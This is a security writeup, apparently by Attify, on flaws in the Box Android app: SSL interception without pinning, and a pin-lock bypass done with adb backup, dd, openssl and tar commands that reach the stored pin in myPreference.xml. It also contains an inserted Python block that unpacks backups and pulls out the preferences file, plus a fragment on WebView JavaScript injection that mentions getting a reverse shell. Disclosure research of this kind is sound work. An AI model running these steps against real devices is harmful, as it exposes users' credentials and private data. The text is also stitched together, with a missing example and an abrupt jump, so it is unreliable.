Box Android and iOS application Security vulnerabilities : Writeup

19.Nov.2014

We at Attify focus on mobile application security auditing and trainings. On weekends, we often spend time writing code for AppWatch – our flagship product, finding vulnerabilities and hacking hardwares. A few months back, we had a look at the Box Android and iOS apps and discovered a lot of security vulnerabilities in it.

**Note:** *All the vulnerabilities have been disclosed to the Box security team, which was quite active in patching all the security issues.*

Let’s start with the Android application.

Vulnerability 1 : Traffic Interception (no SSL Pinning) and MITM

We started the analysis with network traffic interception, to verify whether Box implements SSL pinning properly. Even though the Box application uses SSL, its traffic can be intercepted with any proxy.

This is done by adding the proxy's certificate to the trusted certificate store of the Android device. Once that is in place, an attacker in a man-in-the-middle position can read the username and password sent by the Box app.

The Box app provides an additional security layer for its users by implementing a client-side pin lock to protect its data. In this case the pin is a 4-digit number.

We can bypass this authentication method with the help of the Android backup vulnerability.

It was quite straightforward to exploit this vulnerability and bypass the pin screen. It is also very similar to the vulnerability discovered in LastPass by Chris John Riley.

Setting up Pin Lock :

Go to Menu | Settings | Require Passcode | Set the pin

Configuring Box Pin

Setting up Pin in Box

Take a backup of the Box app:

adb backup com.box.android -f box.ab

Backing up Box App data

Convert and copy the .ab file, reading 24 bytes at a time and skipping the first 24 bytes, which are the header of the .ab (Android backup) file format. If you're interested, a hexdump of the first 24 bytes confirms that they are the Android backup header.

dd if=box.ab bs=24 skip=1 | openssl zlib -d > box.tar

Prepare a list file of the tar archive; it will be useful when repackaging the Android backup file.

tar -tf box.tar > box.list

Extract the box.tar archive in order to modify its contents.

tar -xvf box.tar

The above command extracts the contents of box.tar. Navigate to the apps folder.

The pin lock is stored in myPreference.xml, which is located at /apps/com.box.android/sp/myPreference.xml
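The unpacking steps above (strip the 24-byte header, inflate, list the tar, read the preferences file) as an added Python example that is not the writeup's or Box's own code: it lets you inspect what an unencrypted adb backup exposes, and refuses a password-protected backup instead of mis-parsing it. The sample .ab it builds is constructed, and the preference key name "pin" is an assumption.

```python
import io
import tarfile
import zlib

def parse_ab_header(data: bytes) -> dict:
    """Read the newline-terminated fields of an adb backup (.ab) header.
    Unencrypted backups have four ("ANDROID BACKUP", version, compressed flag,
    encryption "none"): the 24-byte header the writeup strips with dd."""
    lines = data.split(b"\n", 4)
    if len(lines) < 5 or lines[0] != b"ANDROID BACKUP":
        raise ValueError("not an Android backup file")
    return {
        "version": int(lines[1]),
        "compressed": lines[2] == b"1",
        "encryption": lines[3].decode(),
        "header_len": sum(len(line) + 1 for line in lines[:4]),
    }

def ab_to_tar(data: bytes) -> bytes:
    """Same as `dd bs=24 skip=1 | openssl zlib -d` (openssl's zlib subcommand
    exists only in zlib-enabled builds; zlib.decompress yields the same bytes)."""
    hdr = parse_ab_header(data)
    if hdr["encryption"] != "none":
        raise ValueError("backup is password-protected; body is not plain zlib")
    body = data[hdr["header_len"]:]
    return zlib.decompress(body) if hdr["compressed"] else body

def list_backup(data: bytes) -> list:
    """Same as `tar -tf box.tar`: every path exposed to whoever holds the backup."""
    with tarfile.open(fileobj=io.BytesIO(ab_to_tar(data)), mode="r:") as tar:
        return tar.getnames()

def read_member(data: bytes, name: str) -> bytes:
    """Pull one file (here the shared-preferences XML) out of the backup."""
    with tarfile.open(fileobj=io.BytesIO(ab_to_tar(data)), mode="r:") as tar:
        return tar.extractfile(name).read()

def build_sample_backup() -> bytes:
    """Constructed sample .ab, not a real Box backup: one preferences file at the
    path named in the writeup; the key name "pin" and its value are made up."""
    xml = b'<?xml version="1.0" encoding="utf-8"?>\n<map>\n    <string name="pin">1234</string>\n</map>\n'
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tar:
        info = tarfile.TarInfo("apps/com.box.android/sp/myPreference.xml")
        info.size = len(xml)
        tar.addfile(info, io.BytesIO(xml))
    return b"ANDROID BACKUP\n1\n1\nnone\n" + zlib.compress(buf.getvalue())
```

Run against a real box.ab (`open("box.ab", "rb").read()`) the same functions list the archive and pull out myPreference.xml; the fix on the app side is to keep such data out of backups (android:allowBackup="false" or a BackupAgent that excludes it).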

The JavaScript was embedded in the response to the WebView request made by the OneCloudAddNewApp activity, as shown below:

Finally, once the response is rendered, the JavaScript causes Box to delete its own contents. It could obviously be used for far more malicious purposes, such as obtaining a reverse shell by creating a payload with tools such as Drozer.

Another reason this WebView vulnerability was possible was the improper implementation of the onReceivedSslError method (the WebViewClient callback invoked on a certificate error): when it proceeds past the error instead of cancelling the load, the WebView accepts an attacker's certificate and renders whatever response the attacker injects.